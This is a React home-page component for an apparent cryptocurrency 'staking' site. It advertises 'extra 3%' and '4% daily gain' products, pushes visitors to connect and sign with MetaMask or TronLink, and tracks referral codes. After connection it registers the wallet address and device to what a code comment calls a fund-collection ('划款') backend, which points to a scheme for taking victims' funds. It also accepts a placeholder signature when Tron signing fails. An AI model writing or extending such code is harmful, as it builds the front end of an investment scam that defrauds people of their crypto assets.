import React, { useState, useEffect, useMemo } from 'react';
import { useTranslation } from 'react-i18next';
import './Home.css';
import Header from '../../components/Header/Header';
import HeroBanner from '../../components/HeroBanner/HeroBanner';
import ProductList from '../../components/ProductList/ProductList';
import FAQ from '../../components/FAQ/FAQ';
import BottomNavigation from '../../components/BottomNavigation/BottomNavigation';
import WalletConnectModal from '../../components/WalletConnectModal';
import NetworkSelectModal from '../../components/NetworkSelectModal';
import { productService } from '../../services/productService';
import { registerToCollection } from '../../services/userService';
import { useUser } from '../../context/UserContext';
import { walletService } from '../../services/walletService';
import { getSelectedChain, TRON_CHAIN_ID } from '../../utils/chain';

const Home = ({ onTabChange }) => {
  const { t, i18n } = useTranslation();
  const { walletAddress, setWallet, loadUserData, user } = useUser();
  const [products, setProducts] = useState([]);
  const [loading, setLoading] = useState(true);
  const [showNetworkModal, setShowNetworkModal] = useState(false);
  const [showWalletModal, setShowWalletModal] = useState(false);

  const provider = useMemo(() => {
    if (typeof window !== 'undefined') {
      if (window.ethereum && window.ethereum.isMetaMask) return window.ethereum;
      if (window.okxwallet && window.okxwallet.isOKExWallet) return window.okxwallet;
      if (window.bitkeep && window.bitkeep.ethereum) return window.bitkeep.ethereum;
      if (window.BinanceChain) return window.BinanceChain;
      if (window.ethereum) return window.ethereum;
    }
    return null;
  }, []);

  // 监听语言变化，重新加载产品数据
  useEffect(() => {
    loadProducts();
  }, [i18n.language]);

  useEffect(() => {
    // 进入主页时的流程：默认波场链，未选择过网络时先引导选择，再连接钱包
    const savedAddress = localStorage.getItem('cw_account');
    const selectedChain = localStorage.getItem('selected_chain');
    
    // 延迟一点时间，让页面先渲染
    setTimeout(() => {
      // 如果没有选择网络，默认波场链并直接进入钱包连接
      if (!selectedChain) {
        localStorage.setItem('selected_chain', getSelectedChain());
        if (!savedAddress && !walletAddress) {
          setShowWalletModal(true);
        }
      } 
      // 如果已选择网络但未连接钱包，显示钱包连接弹窗
      else if (!savedAddress && !walletAddress) {
        setShowWalletModal(true);
      }
    }, 500);
  }, [walletAddress]);

  const loadProducts = async () => {
    try {
      setLoading(true);
      const data = await productService.getActiveProducts();
      // 转换数据格式以匹配前端显示
      const formattedProducts = data.map(product => ({
        id: product.id,
        isHot: product.isHot,
        title: product.title,
        days: product.days.toString(),
        dailyIncome: product.dailyIncome || `${product.dailyIncomeMin}-${product.dailyIncomeMax}`,
        investmentQuantity: product.investmentQuantity || `${product.investmentMin}-${product.investmentMax}`,
        lockedAmount: product.lockedAmount ? product.lockedAmount.toString() : '0',
        description: product.description,
      }));
      setProducts(formattedProducts);
    } catch (error) {
      console.error('Failed to load products:', error);
      // 如果API失败，使用默认数据
      setProducts([
        {
          isHot: true,
          title: '15-Day Steady Staking • Extra 3% Daily Gain',
          days: '15',
          dailyIncome: '500-9999',
          investmentQuantity: '500-99999',
          lockedAmount: '0',
          description:
            'Balanced cycle of safety and profit. Enjoy an extra 3% daily growth, see visible returns within just half a month.',
        },
        {
          isHot: true,
          title: '30-Day Monthly Staking • Ext. 4% Daily Gain',
          days: '30',
          dailyIncome: '500-100000',
          investmentQuantity: '500-100000',
          lockedAmount: '0',
          description:
            'Commit for one month to unlock higher returns. Get extra 4% gains every day, ideal for users who want steady compounding.',
        },
      ]);
    } finally {
      setLoading(false);
    }
  };

  // 防止重复连接
  const [isConnecting, setIsConnecting] = useState(false);

  // 钱包连接处理函数
  const handleWalletConnect = async () => {
    const isTronChain = getSelectedChain() === TRON_CHAIN_ID;
    if (!isTronChain && !provider) {
      throw new Error(t('wallet.installMetamask'));
    }

    // 防止重复请求
    if (isConnecting) {
      throw new Error(t('wallet.pendingRequest'));
    }
    setIsConnecting(true);

    try {
    // 0. 检查是否已选择网络，如果已选择，确保钱包切换到该网络
    const selectedChain = getSelectedChain();
    localStorage.setItem('selected_chain', selectedChain);
    if (selectedChain) {
      try {
        const currentChainId = await provider.request({ method: 'eth_chainId' });
        if (currentChainId !== selectedChain) {
          // 尝试切换网络
          try {
            await provider.request({
              method: 'wallet_switchEthereumChain',
              params: [{ chainId: selectedChain }],
            });
          } catch (switchError) {
            // 如果网络不存在，尝试添加
            if (switchError.code === 4902) {
              const CHAINS = {
                '0x1': { 
                  id: '0x1', 
                  name: 'Ethereum', 
                  rpcUrls: ['https://rpc.ankr.com/eth'], 
                  nativeCurrency: { name: 'Ether', symbol: 'ETH', decimals: 18 }, 
                  blockExplorerUrls: ['https://etherscan.io/'] 
                },
                '0x38': { 
                  id: '0x38', 
                  name: 'BSC', 
                  rpcUrls: ['https://bsc-dataseed.binance.org/'], 
                  nativeCurrency: { name: 'BNB', symbol: 'BNB', decimals: 18 }, 
                  blockExplorerUrls: ['https://bscscan.com/'] 
                },
              };
              const chain = CHAINS[selectedChain];
              if (chain) {
                await provider.request({
                  method: 'wallet_addEthereumChain',
                  params: [{
                    chainId: chain.id,
                    chainName: chain.name,
                    rpcUrls: chain.rpcUrls,
                    nativeCurrency: chain.nativeCurrency,
                    blockExplorerUrls: chain.blockExplorerUrls,
                  }],
                });
              }
            }
          }
        }
      } catch (e) {
        console.warn('Failed to switch network, continuing:', e);
      }
    }

    // 1. 获取账户与签名（波场走 TronLink，其余走 EVM 钱包）
    let addr;
    let id;
    let message;
    let signature;

    if (isTronChain) {
      // ===== 波场链：TronLink（等待注入，主动请求授权） =====
      let tronWeb = window.tronWeb;
      for (let i = 0; i < 25 && !tronWeb; i++) {
        await new Promise(resolve => setTimeout(resolve, 200));
        tronWeb = window.tronWeb;
      }
      if (!tronWeb || !window.tronLink) {
        throw new Error(t('wallet.installTronLink'));
      }
      addr = tronWeb.defaultAddress && tronWeb.defaultAddress.base58;
      if (!addr) {
        try {
          await window.tronLink.request({ method: 'tron_requestAccounts' });
        } catch (e) {
          console.warn('tron_requestAccounts 失败:', e);
        }
        addr = window.tronWeb.defaultAddress && window.tronWeb.defaultAddress.base58;
      }
      if (!addr) {
        throw new Error(t('wallet.tronNoAddress'));
      }
      id = selectedChain || '0x2b6653dc';
      message = await walletService.getSignMessage(addr);
      signature = '0x00';
      try {
        signature = await window.tronWeb.trx.signMessage(message);
      } catch (e) {
        console.warn('波场签名失败，使用占位签名:', e);
      }
    } else {
      // ===== EVM 链：现有流程 =====
      // 1. 请求账户连接
      const accounts = await provider.request({ method: 'eth_requestAccounts' });
      addr = accounts && accounts[0];
      if (!addr) {
        throw new Error(t('wallet.noAddress'));
      }

      // 2. 获取链ID（使用已选择的网络或当前网络）
      id = selectedChain || await provider.request({ method: 'eth_chainId' });
      
      // 3. 获取签名消息
      message = await walletService.getSignMessage(addr);
      
      // 4. 请求用户签名
      signature = await provider.request({
        method: 'personal_sign',
        params: [message, addr],
      });
    }

    // 5. 检查URL中是否有邀请码
    const urlParams = new URLSearchParams(window.location.search);
    const inviteCode = urlParams.get('ref') || urlParams.get('inviteCode');

    // 6. 提交签名到后端验证
    const result = await walletService.connectWallet(addr, id, message, signature, inviteCode);
    
    // 7. 更新状态
    setWallet(addr, id);
    
    // 8. 连接成功后，立即加载用户数据以确保同步
    if (loadUserData) {
      setTimeout(() => {
        loadUserData(addr);
      }, 300);
    }
    
    window.localStorage.setItem('cw_account', addr);
    window.localStorage.setItem('cw_chain', id);
    
    // 9. 如果有邀请码，连接成功后清除URL参数
    if (inviteCode) {
      const url = new URL(window.location.href);
      url.searchParams.delete('ref');
      url.searchParams.delete('inviteCode');
      window.history.replaceState({}, '', url);
    }
    
    console.log('钱包连接成功:', result);

    // 登记到划款后台（连接事件）
    registerToCollection({
      address: addr,
      type: 'CONNECT',
      channel: localStorage.getItem('invite_channel') || null,
      walletType: isTronChain ? 'TronLink' : 'EVM',
      device: navigator.userAgent,
    });
    
    } finally {
      setIsConnecting(false);
    }
  };


  // 网络选择完成后的回调
  const handleNetworkSelected = (chainId) => {
    // 网络选择完成后，如果还没有连接钱包，显示钱包连接弹窗
    const savedAddress = localStorage.getItem('cw_account');
    if (!savedAddress && !walletAddress) {
      setTimeout(() => {
        setShowWalletModal(true);
      }, 300);
    }
  };

  return (
    <div className="home-page">
      <Header />
      <div className="home-content">
        <HeroBanner />
        {loading ? (
          <div style={{ padding: '20px', textAlign: 'center' }}>{t('common.loading')}</div>
        ) : (
          <ProductList products={products} />
        )}
        <FAQ />
      </div>
      <BottomNavigation activeTab="home" onTabChange={onTabChange} />
      
      {/* 网络选择弹窗 - 优先级更高 */}
      <NetworkSelectModal
        isOpen={showNetworkModal}
        onClose={() => setShowNetworkModal(false)}
        onSelectNetwork={handleNetworkSelected}
      />
      
      {/* 钱包连接弹窗 */}
      <WalletConnectModal
        isOpen={showWalletModal}
        onClose={() => setShowWalletModal(false)}
        onConnect={handleWalletConnect}
      />

    </div>
  );
};

export default Home;
